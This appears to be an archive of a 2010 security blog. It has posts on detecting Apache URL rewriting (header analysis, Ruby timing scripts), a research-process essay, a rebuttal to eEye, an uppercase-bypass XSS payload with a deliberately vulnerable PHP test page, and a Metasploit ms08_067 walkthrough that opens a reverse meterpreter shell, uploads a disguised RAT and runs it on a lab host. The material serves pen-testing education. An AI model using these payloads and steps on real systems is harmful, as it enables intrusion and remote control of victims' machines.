08 October 2010

Detecting URL Rewriting (part 2)

This post continues documenting the process I'm going through to come up with some way a client of a web site can, first, determine whether URL rewriting is occurring on a given web server, and second, in cases where it is used, determine what the rewrite rules are.

I left off with Apache configured, and a simple rule established for mod_rewrite. I now need to decide whether to use mod_rewrite to handle the rewrite using a redirect (via an HTTP 302 response), or to process it internally. As I mentioned, the difference between these two methods is quite large.

For example, if I choose to send a redirect (e.g. by amending my rule to include an [R] flag), like so ...
RewriteRule    /litterbox/(.*)  /sandbox/$1 [R]
... the rewrite rule will cause an incoming request for http://bar.com/litterbox/bar1.php to be redirected to http://bar.com/sandbox/bar1.php via HTTP response headers.

Examining the relevant portion of the HTTP request and response headers associated with this process, the conversation looks like this:

Initial request:
GET /litterbox/bar1.php HTTP/1.1
Host: bar.com

Initial response:
HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 04:50:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Location: http://bar.com/sandbox/bar1.php

In the response above, notice that the server has returned an HTTP 302 status response, and included a Location: header which contains the URL to the content. The browser receives this, and sends a new request to that location:

Redirected request:
GET /sandbox/bar1.php HTTP/1.1
Host: bar.com

This request is met with the final response, which includes the content at /sandbox/bar1.php:
HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:50:29 GMT

This is how I've used mod_rewrite in the past. The rules I've set to enforce SSL have been very similar to the one given in the example. At first glance, it seems that it will be easy to tell when rewriting is occurring... all that's required is to look for the 302 response!
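In Ruby, that naive check might look something like this (just a quick sketch against my test host; Net::HTTP doesn't follow redirects on its own, so the 302 and its Location: header are exactly what the client sees):

#!/usr/bin/env ruby
# Naive rewrite "detector": flag any URL that answers with a 302 + Location.
require 'net/http'
require 'uri'

url = URI.parse('http://bar.com/litterbox/bar1.php')
response = Net::HTTP.get_response(url)

if response.code == '302' && response['location']
  puts "redirected to #{response['location']} -- rewriting? maybe..."
else
  puts "no redirect seen (status #{response.code})"
end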

Not so fast

There are a couple of problems with this theory. The first is that there are other mechanisms which can produce this same HTTP response code. For example, the following PHP code will cause an HTTP 302 response to be sent by the server:
<?php
header("Location: http://bar.com/sandbox/bar1.php");
?>

When I put that code into a file located at http://bar.com/redir.php, the response to a GET request for that file looks pretty much exactly like the one generated natively by Apache above:

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 05:38:09 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Location: http://bar.com/sandbox/bar1.php

From this, it would seem that there is no way to distinguish between a redirect coming from mod_rewrite, and one stemming from some other mechanism.

More importantly though (and a bigger blow to my high hopes for an easy answer), the [R] flag is optional: by default, Apache doesn't return a redirect at all when mod_rewrite is used. Looking up how Apache handles rewriting, there's a fair amount of documentation on the process specific to the 2.2 version I'm using:

The nutshell version is this: requests that are rewritten without sending a 302 to the client are processed entirely within the Apache kernel. No indication is given to the client that a rewrite has occurred.

In fact, it appears that the only way an application hosted on the server can know it has been reached via a rewritten request is to check for the presence of one or both of two server variables which only appear when Apache has processed a rewrite ... despite their names, they do not appear on a redirect =)

(Recall that I can see these because the PHP script I wrote includes a printout of every server variable. It seems that doing this was a good idea indeed!):

REDIRECT_STATUS = 200
REDIRECT_URL = /litterbox/bar1.php

Note that these variables are different from the ones the Apache documentation says it adds. I'm not sure why that is, but since they are only available as server variables, they are completely out of reach of a client accessing a given URL on the host.

That sucks.

At this point, I give up on the 302 response and Location: header theory: it's both misleading (in that a 302 response may not be the result of a URL rewrite), and inconsistent in that rewritten URLs may not provide a 302 response at all.

I start thinking of other mechanisms I could use. One that comes immediately to mind is the Referer header. This is an HTTP request header that is sent to a web server when, for example, a user clicks a link: the host the link resolves to receives the request for a URL, along with the URL the user came from. An example of this can be seen here:

Initial Request:
GET /litterbox/bar1.php HTTP/1.1
Host: bar.com

Initial Response:
HTTP/1.1 200 OK
Date: Fri, 08 Oct 2010 05:51:54 GMT
[content]
  <div><a href="bar2.php">bar2</a></div>
[more-content]

The content served in the response contains a link to bar2.php. When I click that link, the fact that I'm coming from the bar1.php page is sent in the request, as shown below:
Request to bar2.php:
GET /litterbox/bar2.php HTTP/1.1
Host: bar.com
Referer: http://bar.com/litterbox/bar1.php


That's all well and good, but as you can see, the Referer still shows /litterbox as the URL I was coming from. That's because the referer is specified by the user agent (a browser in this case). Since the browser didn't receive any indication that the content it is being served has come from a different location than it requested, it thinks it's still at /litterbox and so sends that location in the headers.
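Since the Referer is just something the user agent writes into the request based on what it believes its location to be, a client script can set it to anything at all. A quick Ruby sketch against my test host, purely to illustrate that the value is client-supplied:

#!/usr/bin/env ruby
# The Referer header is just another request header the client chooses to send.
require 'net/http'

req = Net::HTTP::Get.new('/litterbox/bar2.php')
req['Referer'] = 'http://example.com/anything-i-like'   # entirely client-controlled

res = Net::HTTP.start('bar.com', 80) { |http| http.request(req) }
puts res.code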

So much for using that as a detection of rewriting. What's next...
So far, I've tried a couple of different ideas to determine whether a client can tell if URL rewriting is in use. I've ruled out the 302 response and accompanying Location: header as unfit for this purpose. I've also briefly played with the idea of using the Referer, and quickly ruled that out as well. I need to come up with some more creative way to tell.

How about timing?

Thinking about this problem a bit, it occurs to me that, since the Apache kernel has to map rewritten URLs internally to come up with a computed URL to serve content from, I may be able to use how long a request takes to load as an indicator.

To test this theory out, I'm going to use ruby, because I'm familiar with it, and it allows me to quickly throw together some proof-of-concept code.

Since I have the advantage in this case of knowing for sure what is being rewritten and what is not, I can use the benchmark module in ruby to measure the time it takes to get a file where rewriting is occurring, and where it is not. I can then compare the two to see if this theory bears further investigation.

For the initial test, I decide to use the bmbm method of the benchmark module for two reasons: 1) it automatically gives me two iterations to compare, and, more importantly, 2) it initializes the environment and tries to minimize skewed results by going through a rehearsal process before benchmarking "for reals". With that decided, I came up with the following script:

#!/usr/bin/env ruby
require 'net/http'
require 'uri'
require 'benchmark'
include Benchmark

bmbm do |test|
  test.report("rewrite:") do
    Net::HTTP.get_response URI.parse('http://bar.com/litterbox/bar1.php')
  end
  test.report("non-rewrite:") do
    Net::HTTP.get_response URI.parse('http://bar.com/sandbox/bar1.php')
  end
end

I've created two labels in this benchmark: one for the known rewritten URL, and one for the known non-rewritten URL. When I run this script, I get the following results:

Rehearsal ------------------------------------------------
rewrite:       0.010000   0.000000   0.010000 (  0.001429)
non-rewrite:   0.000000   0.000000   0.000000 (  0.000876)
--------------------------------------- total: 0.010000sec

                   user     system      total        real
rewrite:       0.000000   0.000000   0.000000 (  0.001105)
non-rewrite:   0.000000   0.000000   0.000000 (  0.000907)

That's pretty interesting! When I run this on the same host the web server is located at, I can definitely tell a difference between rewritten and non-rewritten content!

I need to look into this further. The first thing that needs to happen is that I perform these requests many more times and look at the timing. A single request is useful as a quick "is there merit to this?" check, but the apparent difference could just be a fluke of those particular requests at that particular time. I need to increase the number of iterations and determine whether, statistically, there is a difference in the time it takes to serve a rewritten URL vs. a non-rewritten one.
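Something along these lines should do for a first pass (a rough sketch using a plain timing loop rather than bmbm; the URLs are my test setup, and the sample size is arbitrary):

#!/usr/bin/env ruby
# Time many GETs of a rewritten and a non-rewritten URL, then compare
# the mean and standard deviation of the two samples.
require 'net/http'
require 'uri'
require 'benchmark'

SAMPLES = 100   # arbitrary sample size for now

urls = {
  'rewrite'     => URI.parse('http://bar.com/litterbox/bar1.php'),
  'non-rewrite' => URI.parse('http://bar.com/sandbox/bar1.php')
}

urls.each do |label, url|
  times = (1..SAMPLES).map do
    Benchmark.realtime { Net::HTTP.get_response(url) }
  end

  mean   = times.inject(0.0) { |sum, t| sum + t } / times.size
  stddev = Math.sqrt(times.inject(0.0) { |sum, t| sum + (t - mean) ** 2 } / times.size)

  printf("%-12s mean: %.6fs  stddev: %.6fs\n", label, mean, stddev)
end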

I also need to look at what factors may affect the results. Some immediate considerations that come to mind are:
  1. Is the Apache server caching content, causing it to be served faster the second time?
  2. Am I able to prevent that if so?
  3. On a local machine, this may work, but what happens across a LAN?
  4. What happens to the timing when requests go across the Internet?
  5. How much does "heavy" content (video, images, etc.) affect the timing?
  6. Can I time just getting the HTTP headers, to avoid loading content?

I need to answer some of these before testing, and some of these will be answered as the testing progresses.
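Question 6, at least, is easy to prototype: Net::HTTP can issue a HEAD request, so the timing can exclude the response body entirely. A sketch (same caveats as above; note that reusing one connection like this also removes connection setup from the measurement):

#!/usr/bin/env ruby
# Time HEAD requests only, so heavy page content doesn't skew the numbers.
require 'net/http'
require 'benchmark'

paths = ['/litterbox/bar1.php', '/sandbox/bar1.php']

Net::HTTP.start('bar.com', 80) do |http|
  paths.each do |path|
    elapsed = Benchmark.realtime { http.head(path) }
    printf("%-22s %.6fs\n", path, elapsed)
  end
end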

[to be continued]

01 October 2010

Detecting URL Rewriting (part 1)

[edit 2010-10-02]: I realized after replying to cdman's comment that I had neglected to include the goals of this project in this post, but had included them in this one instead. I've edited the beginning here to include the first part of that post.

As I mentioned earlier: I’ve been pondering URL rewriting for the past couple of days - trying to come up with some way a client of a web site can first: determine if URL rewriting is occurring on a given web server, and second: in cases where it is used, determine what the rewrite rules are.

I started this process by doing some homework to learn more about how URL rewriting occurs. I’ve used Apache’s mod_rewrite in the past to accomplish some basic tasks like redirecting incoming http:// requests to their https:// counterpart to enforce SSL usage, but I had never done much beyond that.

I decided (as I often do) that the best way to learn was to play. Determining whether URL rewriting is in use, and trying to map the rules, means I need a portion of a web site that is using URL rewriting and one that is not (so I can compare the two). I also need some rewrite rules to work with. Coming up with a random set of rules is difficult, so I gave myself what was, in my mind, a likely scenario:

The Bar, Inc. marketing dept. has realized that their 'litterbox' product line has a name which creates a negative impression. It's decided that 'sandbox' is a much better brand for the products. Of course, with the rebranding, the web site has to be updated; it simply won't do to have links going to bar.com/litterbox/ now that the name has changed.

Begrudgingly, the developers of the Bar, Inc. website put in a ton of overtime to change all the links in the code. Then someone realizes that all the Bar, Inc. customers and business partners also have links that are going to break. The developers can't do anything about that; it's outside their control. It now falls to the sysadmin to make sure that no critical third party links get broken.

As the sysadmin, my task is simple: take any requests for /litterbox/whatever and have them go to /sandbox/whatever instead.


Excellent! I now have an interesting story to keep me from getting bored. (OK, fine… interesting is subjective ;-)

More importantly, the fictitious set of requirements dictated in the scenario means that I have a framework established for how to approach setting up this research project.

That means it’s time to get to work.

Preparing The Environment


To get this set up in a way that meets the criteria of the scenario, I first need to have a website. I have a Linux box handy, so I decide to do my testing using Apache. The specific version and OS I’m using is Apache 2.2.9 on Debian Linux, with the Suhosin Patch. In other words, I’m using the default apache2 (mpm-prefork) package on Debian 'lenny'.

I create a directory named sandbox in the Apache web root (which is /var/www on Debian). I then create 4 files in that directory: bar1.php, bar2.php, bar3.php, and bar4.php. Next I edit each of these files to contain some generic code similar to the following (changing the title and h1 tags to correspond to the file name):
<html>
<head>
<title>bar1</title>
</head>
<body>
<h1>bar1</h1>
<div><a href="bar1.php">bar1</a></div>
<div><a href="bar2.php">bar2</a></div>
<div><a href="bar3.php">bar3</a></div>
<div><a href="bar4.php">bar4</a></div>
<hr />
<?php
// dump every server variable as a key/value pair
foreach($_SERVER as $key_name => $key_value) {
  print $key_name . " = " . $key_value . "<br>";
}
?>
</body>
</html>


The PHP code in these files simply spits out the server variables ($_SERVER) as key/value pairs on the page. This may prove useful to review later, so I'm including it in each page.

Now that I have the Bar, Inc. "website" in place, it's time to contemplate how to proceed. I have at least four options:
Edit 2010-10-04: I'd neglected to consider the Apache Alias directive. I've added that to the list.
  1. I can enable the SymLinks option and create a link from litterbox to sandbox.
  2. I can use mod_rewrite to change requests for litterbox to sandbox.
  3. I can use mod_rewrite to send an HTTP 302 response redirecting requests to the new location.
  4. I can use the Apache Alias directive to map requests for litterbox to a specific path on the file system.

After considering these for a bit, I decide that leaving a bunch of stale links lying around the directory tree is a BadThing. For similar reasons, I decide not to use the Alias directive, so that future sysadmins don't become confused. Accordingly, I select mod_rewrite as the way to go. (Thankfully, since that’s the whole point of this project ;-)

Setting up mod_rewrite


The first thing I need is for the mod_rewrite module to be loaded in the Apache configuration. How this is done varies based on the installation of Apache. In Debian it's extremely simple: a single command (and later, a reload of the Apache server) will suffice:
# a2enmod rewrite


Now that the module is enabled, I need to define some rules. This can be done by editing the configuration file that defines the web site. In Debian, this means editing the file /etc/apache2/sites-available/<site-name>. Because I’m just using the default configuration, I place my changes in /etc/apache2/sites-available/default.

The syntax for mod_rewrite can be quite complex, and it provides some very powerful features. However, the scenario I set for myself dictates what I need as far as rewrite rules go… that is, I need to change "litterbox" to "sandbox". Configuring this in Apache is easy enough; it looks like this:
RewriteEngine on
RewriteRule    /litterbox/(.*)  /sandbox/$1


The first line turns on the RewriteEngine. The second establishes that I want to replace "/litterbox/" followed by any sequence of characters (zero or more) with "/sandbox/" followed by whatever characters were captured when the request came in.
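Just to sanity-check the pattern outside of Apache, the same substitution expressed in Ruby looks like this (purely illustrative; Apache's regex handling isn't identical, but the capture-group behaviour is the same idea):

# The capture group (.*) grabs everything after /litterbox/ and
# the backreference (Apache's $1, Ruby's \1) splices it back in after /sandbox/.
path = '/litterbox/bar1.php'
puts path.sub(%r{/litterbox/(.*)}, '/sandbox/\1')   # => /sandbox/bar1.php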

That single rule should accomplish the goal of my scenario; however, I still have one choice left to make: whether to have mod_rewrite do this via an HTTP redirect, or rewrite the requests internally.

The difference between these two is not trivial.
Before I go any further, I need to gain a better understanding of how URL rewriting works in Apache.


[to be continued]

on security research

I’ve been pondering URL rewriting for the past couple of days - trying to come up with some way a client of a web site can first: determine if URL rewriting is occurring on a given web server, and second: in cases where it is used, determine what the rewrite rules are.
As I've been thinking about this, it has occurred to me that, despite the proliferation of security research whitepapers and blog posts, there is a scarcity of 'this is the process I went through to do this research' information out there.

There are mountains of articles and documents, with dizzying arrays of statistics and metrics (often intermingled with a fair amount of marketing fluff), and yet most of the whitepapers, and certainly the various conference presentations, simply don’t talk about the process - preferring instead to present the end results.
As security professionals, we gather together at a multitude of conferences where we do a wonderful job displaying all of this shiny data and showing off new marvelous tricks to each other with varying degrees of self-indulgence. Yet most of how we came to have such cool stuff is left out of the picture entirely.

I understand why that is, of course. Simply put, the process is boring! It’s full of failure, and repeatedly throwing things at a wall and observing what happens. Nobody wants to sit in a small room with a couple hundred hackers listening to someone drone on for an hour about how “this didn’t work…and neither did this”, I get that. Added to that is the fact that, in some cases, the research is being done for a corporate (or government) entity. In such a situation, the process may be withheld not from a lack of desire to share on the researcher’s part, but because they are not permitted to do so by the organization for which the work was done.

Despite these reasons, in my opinion it is a disservice to ourselves, to the profession, and to others who may be interested in performing their own research, when all we do is deliver an end product in a glossy PDF or a shiny PowerPoint presentation. That is simply not research; it's promotion. Research, in an academic sense, implies documenting the entire process: both success and failure. This is not what I find when I look at the typical infosec industry output.

Accordingly, I’ve decided that I will share how I go about this particular project, and not just release some PDF or tool as a result of it. I’ll post my process here, any notes and thoughts, as well as any code I come up with. (Well, links to code anyway. I’ll probably keep the code itself in github).

One of the reasons I’m doing this is that I expect to fail. =)

As I’ve considered how one can detect URL rewriting, and as I’ve started investigating the details of how it works, my initial thought is that detecting it simply won’t be possible.

If that’s correct, I think it’s important that I present what I tried, along with the fact that ultimately it didn’t work. That’s vital information, in that it prevents someone else from wasting cycles repeating a process that’s already been done.

As well, understanding why something failed may lead to discovering a way to succeed.

OK… this rant being done now, my next post will start the process of documenting my research into detecting URL rewriting.

27 May 2010

thinking sideways

Had an interesting question posed to me today. A web application was using portions of the GET request to create content on a page, and not properly sanitising the input. The result was a web page that was potentially vulnerable to cross-site scripting (XSS). However, there was a catch. The application, while not checking for security risks, was converting the GET request parameters to all uppercase.

This meant that, since javascript is case sensitive, the usual methods wouldn't work. For example, you couldn't use document.write() or alert(), because they were rendered as DOCUMENT.WRITE() or ALERT() instead.

Here's a quick and dirty PHP script I wrote that mimics this behaviour (note that you will need to have magic_quotes_gpc turned off in php.ini for this to work):
<?php
echo '<form name="testform" method="post">';
echo '<select name="test">';
if (isset($_GET['options'])) {
  // echo the user-supplied value back, uppercased and unsanitised
  echo strtoupper($_GET['options']);
} else {
  echo '<option value="empty">EMPTY</option>';
}
echo '</select>';
echo '<input type="submit" name="submit" value="submit" />';
echo '</form>';
?>


To test it out, simply browse to http://yourhost.yourdomain/test.php?options=uppercaseftw


So, the question as a pen tester is, how can I break this?

Turns out the answer is pretty simple: you simply make your own javascript file, host it on a server somewhere, give it an uppercase file name, and create functions with uppercase names.

For example, I created the following XSS() function, in a file named XSS.JS:

function XSS() {
alert('xss'); // or whatever
}


Now, I need to load this code into the page I'm requesting, and then somehow call the XSS() function. I did this by closing the select tag in my options GET parameter, and providing my own script tag. I then created a link to "foo", and set an onMouseOver event to call the XSS() function.

Here's what the request URL looks like to exploit this code:
http://localhost/sandbox/index.php?options=<option value="number1">number1</option></select><script language="javascript" src="XSS.JS"></script><a href="foo" onmouseover="XSS()">clicky</a>   <!--


The result is a nice link that, upon placing the mouse over it, triggers the javascript event which fires off the usual alert box.

The source code of the resulting page looks like this:
<form name="testform" method="post">
<select name="test">
<OPTION VALUE="NUMBER1">NUMBER1</OPTION>
</SELECT>
<SCRIPT LANGUAGE="JAVASCRIPT" SRC="XSS.JS"></SCRIPT>
<A HREF="FOO" ONMOUSEOVER="XSS()">CLICKY</A>
<!--</select>
<input type="submit" name="submit" value="submit" />
</form>


Nothing particularly awesome about this, but it was a situation I'd not come across before, and it took me a minute to figure out a way around it. So I thought I'd share =)

03 May 2010

on pen testing and fireworks

eEye posted a blog entry recently that attempted to compare providing free tools for pen testing to encouraging someone to use fireworks. This post from eEye is actually part of a growing pattern of 'pen test/full disclosure == criminal' BS being tossed around by various companies (notably, each of which performs vulnerability assessments itself), but I don't have time to fully address my thoughts on that at the moment (hint: there's another post coming later on this topic).

Specifically, eEye's post makes the following statements:

Penetration tools clearly allow the breaking and entering of systems to prove that vulnerabilities are real, but clearly could be used maliciously to break the law.

Making these tools readily available is like encouraging people to play with fireworks. Too bold of a statement? I think not. Fireworks can make a spectacular show, but they can also be abused and cause serious damage. In most states, only people licensed and trained are permitted to set off fireworks.


This analogy is flawed for a number of reasons, not least of which is that the claim that most states disallow fireworks to anyone other than licensed pyrotechnicians is untrue.

I made a comment to their site about this, but as it has not been approved yet, I'm posting my comment here as well.

Here's my two bits:

Since you relate the use of free pen test tools to fireworks as an argument, it should probably be pointed out that the majority of states in the US permit consumer fireworks, and only a very few disallow them. See: http://www.cpsc.gov/cpscpub/pubs/012.html

Perhaps the free pen test tools are “consumer grade” vs. the commercially licensed products that, to follow your analogy, should apparently only be used by licensed professionals (though frankly, I know folks in #metasploit that I trust with these tools more than many CISSPs that I know…)

Either way, I’m glad these tools are available, and free, and I am as grateful that I can use them as I am for the fond memories I have of lighting off fireworks with my family as a child. There’s something about being out in the field and participating that makes the moment much more enjoyable than simply watching someone else do it for you.


*update*
eEye has since replaced the entirety of the original post with one that essentially states "ummm... we meant that using free pen testing tools without permission is bad". *sigh*.

25 March 2010

Even When You Know You're Pwnd, It's Hard To See

I'm playing around with a RAT showdown for a project I'm working on (teaser: It will be a comparison of SharK 3.1, Poison Ivy 2.3.2, and the GPL version of Immunity Inc's Hydrogen).

While doing this, it really hit home how tough it is to tell a host has been owned if it's being done right.

I know this anyway, having been on the incident response side of things for a number of years, so it's not news really. It's just that every now and then something springs back up from memory and smacks you clear across the face and screams "Oh Yeah!" in a Randy "Macho Man" Savage impression. This was one of those moments for me.

Let me give an example. I'll do that by combining it with a "how to use the metasploit framework to upload binaries" overview first.

So, step 1 is: get MSF3, and run the msfconsole. I'm going to skip that step here, and jump straight to setting the payload we want (meterpreter), and exploiting.

First, set the payload:

 msf > setg payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp


Now pick everyone's favorite exploit: ms08_067_netapi
 msf > use exploit/windows/smb/ms08_067_netapi 


Let's take a look at the options:
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     10.0.1.51        yes       The local address
   LPORT     4444             yes       The local port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


Some of these were set for me via my msfconsole.rc file (specifically, the LHOST setting for the payload).
Now I pick the target I'll be exploiting, and set it with the RHOST option:

msf exploit(ms08_067_netapi) > set RHOST 10.0.1.71
RHOST => 10.0.1.71


Once that's all set, I can exploit the host:
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.0.1.51:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (10.0.1.51:4444 -> 10.0.1.71:1082)


BAM! I have a meterpreter session (ms08_067 isn't called 'old faithful' for nothing.)

OK. Pentest done. Next B0x!

Unfortunately, that's too often the case. This is sad really, because there's so much more I can do with this. Like the following ;-)

Let me start by finding out some information about the session, what privs I have on the host, and what process I'm running under:

 meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > getpid
Current pid: 1108

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
632 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
680 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
704 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
748 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
764 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
940 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
988 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1108 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1184 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1280 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1448 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1704 explorer.exe x86 0 VIKTIM2\viktim C:\WINDOWS\Explorer.EXE
1860 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\msdtc.exe
352 mqsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\mqsvc.exe
832 mqtgsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\mqtgsvc.exe
768 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
4032 sqlservr.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
4052 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
4044 dllhost.exe x86 0 VIKTIM2\IWAM_VIKTIM2 C:\WINDOWS\system32\dllhost.exe
3692 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
3896 IEXPLORE.EXE x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Internet Explorer\IEXPLORE.EXE


Pretty cool. As expected, I'm running as the local system, and have attached to the svchost.exe process (pid# 1108).

If I look at the current working directory for the session, I see it's the Windows system32 directory:
meterpreter > pwd
C:\WINDOWS\system32


That's all very cool, but for this example, I want to interact with a user session.
Looking at the process list, I see that there's a 'viktim' user logged in and that user is running explorer.exe in process 1704.

I'm going to try to switch to that process, using the handy migrate function provided by metasploit:

meterpreter > migrate 1704
[*] Migrating to 1704...
[*] Migration completed successfully.

meterpreter > getuid
Server username: VIKTIM2\viktim


Excellent. I've now switched to a process running in the context of my target user.
Let me take a look at what my current directory is now:

meterpreter > pwd
C:\Documents and Settings\viktim


What I want to do now is to upload my malware to the host.
In this case, I'll be uploading a remote access trojan I built using sharK.
I've named the executable msdce32.exe in a sad attempt to be sneaky ;-)
To upload the file to the victim host, I use the upload function in meterpreter:

 meterpreter > upload msdce32.exe
[*] uploading : msdce32.exe -> msdce32.exe
[*] uploaded : msdce32.exe -> msdce32.exe


Looks like the file upload was successful, so I try running it using the execute command.
This command takes a -f parameter with the filename to execute:

meterpreter > execute -f msdce32.exe
Process 292 created.


Very nice. Looking at my sharK console, I see that the process worked, because my victim has now connected to my SIN and I am able to use sharK to interact with it. (That will be a different post entirely, but here's a screenshot of what it looks like. Note that the XP Desktop in the image below is actually a screen capture of the victim host that sharK provides when you mouseover the connection in the SIN):
[screenshot: the sharK SIN console; mousing over the connection shows a capture of the victim's XP desktop]

Since I'm done exploiting my victim user, let me go back to running as SYSTEM using the getsystem command in meterpreter:

meterpreter > getsystem
...got system (via technique 1).


Since I'm back at system, let me see if I can see my trojan running:

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
632 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
680 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
704 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
748 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
764 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
940 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
988 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1108 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1184 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1280 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1448 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1704 explorer.exe x86 0 VIKTIM2\viktim C:\WINDOWS\Explorer.EXE
1860 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\msdtc.exe
352 mqsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\mqsvc.exe
832 mqtgsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\mqtgsvc.exe
768 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
4032 sqlservr.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
4052 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
4044 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
3692 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
3896 IEXPLORE.EXE x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Internet Explorer\IEXPLORE.EXE
2988 IEXPLORE.EXE x86 0 VIKTIM2\viktim C:\Program Files\Internet Explorer\IEXPLORE.EXE
916 IEXPLORE.EXE x86 0 VIKTIM2\viktim C:\Program Files\Internet Explorer\IEXPLORE.EXE
3448 IEXPLORE.EXE x86 0 VIKTIM2\viktim C:\Program Files\Internet Explorer\iexplore.exe


Hmm.. Nothing really stands out.
For fun, I kill the server from the sharK SIN and compare the process table without the RAT running:

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
632 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
680 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
704 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
748 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
764 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
940 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
988 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1108 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1184 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1280 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1448 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1704 explorer.exe x86 0 VIKTIM2\viktim C:\WINDOWS\Explorer.EXE
1860 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\msdtc.exe
